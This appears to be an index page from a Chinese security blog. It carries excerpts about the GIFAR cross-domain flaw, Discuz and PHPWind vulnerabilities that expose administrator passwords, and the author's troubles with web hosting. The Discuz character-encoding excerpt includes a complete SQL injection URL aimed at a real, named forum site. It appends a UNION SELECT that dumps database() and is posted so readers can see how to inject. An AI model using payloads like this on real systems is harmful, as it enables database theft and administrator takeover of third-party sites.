关于GIFAR的一些补充分析
作者:axis
原文链接
思路有点乱,想到什么说什么吧。
这个漏洞的危害主要在于跨域的影响上。普通的XSS漏洞可能需要在target site上找一个XSS的漏洞,然后诱使受害者去访问存在XSS的页面或者是点击一个XSS的link。
但是这类跨域漏洞不同,他不需要在target site上做什么,而是只需要在任意一个第三方站点上构造一些恶意脚本就可以实施攻击了,攻击范围将扩大许多许多。当然这个漏洞有点特殊,我们稍后再讲细节。
其次就是老外在文章里说的,java只是这种利用方式的一种,这种捆绑文件的方式还有很多利用途径。其实这里主要说的就是如果在服务端没有做好过滤,这种捆绑文件能够被某些客户端程序强行解析的话,就会存在一个利用。
阅读全文 »
DISCUZ字符转码漏洞
来源:凋凌玫瑰’s blog
最近出来的php第三方编码转换类漏洞又要死一大批php站了。
先是phpwind接着又是discuz论坛
编码转换没处理的都会存在这类漏洞了
phpwind的大家都知道了,今天群里还有人不知道discuz的。
顺便在群里看到个discuz论坛的站,发出来就都知道咋注了。
http://bbs.hefei.cc/space.php?username=%cf’%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*
我个人还是比较反对四处黑站的。
discuz获取任意管理员密码漏洞
文章作者:冰封浪子
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
漏洞说明:Discuz 论坛系统 是一套采用php+mysql数据库方式运行,在其中发现了一个安全漏洞,成功利用此漏洞可以提取管理员的密码进入后台,取得管理员权限。
漏洞解析:在Discuz的wap模块中的字符转码程序存在问题,在discuz的wap模块中,该编码转换类存在严重的问题。在Discuz中,wap是默认开启的,很容易被攻击者利用,这个问题存在与discuz所有版本中。
在discuz代码中存在多处可利用的地方,如:pm.inc.php/search.inc.php等,下面给出可疑代码片段:
阅读全文 »
关于最近没有及时更新的说明
不知道大家注意到没,最近更新都不太及时,每次都是积攒很多,然后一次性更新。
所以大家的阅读器里就会一下子出现很多的未读。
最近我的blog真是多灾多难,转了wordpress之后,放到了mediatemple上,结果又因为资源占用问题被罚款(1、2),实在没办法放到了国内的服务器上,结果又嫌win下跑的不爽,就又换到朋友送我的GoDaddy上,以为终于可以安稳了,结果现在又出现很奇怪的问题,以至于我要挂代理或者VPN才能访问我的blog,因此才会更新不及时。
部分河南网通无法访问我的blog,包括我自己,具体现象为:
连接被重置,清下cookies就可以访问几分钟,之后就又被重置。
tracert一下,正常。
本来连接被重置是被GFW的典型表现,但是我清下cookies却就又可以访问了。
试着换回默认主题,禁用所有插件,不行。
甚至直接在服务器上绑一个域名,然后全新安装一个wordpres,问题依然存在。
这样已经可以确定是服务器的问题了,但是我不明白为什么清下cookies就可以访问几分钟。
准备再买一个Dreamhost,然后搬过去,希望不要再出现奇怪的问题。
ps:iPhone升级到了2.0,升级过程中竟然还正好遇到停电,不过好在没变砖,2.0还没1.1.4好用,速度慢,不稳定,耗电量大,唯一的好处就是有了很多破解的游戏和软件,也装上了metasploit玩,不过我做的自定义固件包明明有设置升级BootLoader到4.6的,结果还是没升上去,还是又用BootNeuter重新刷了一下BL。(这个ps好长)
Tags: Cookie, WordPressphpwind任意修改管理员密码漏洞
漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限。
漏洞厂商:http://www.phpwind.net
漏洞来源:http://www.80sec.com/release/phpwind-admin-pass-change-vul.txt
阅读全文 »